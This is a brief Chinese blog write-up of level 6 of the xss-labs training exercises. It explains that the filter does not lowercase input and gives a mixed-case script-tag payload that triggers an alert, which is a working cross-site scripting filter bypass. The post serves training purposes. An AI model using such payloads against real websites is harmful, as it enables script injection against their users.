xss-labs level 6

管理员 2020-03-11 PM 255℃ 3条

1.直接查看源码

发现没有使用strtolower()函数进行转换为小写

2.那么很简单,大小写绕过就好了

payload:

" ><sCRipt>alert('XSS')</sCript>

标签: 大小写绕过

非特殊说明,本博所有文章均为博主原创。

上一篇 xss-labs level 5
下一篇 xss-labs level 7

评论啦~



已有 3 条评论


  1. XSS-labs练习笔记 – 0verflow's blog

    […] xss-labs level 6 […]

    回复 2020-03-11 18:35
  2. 1
    1

    1

    回复 2024-02-16 22:32
  3. 1
    1

    1

    回复 2024-02-16 22:51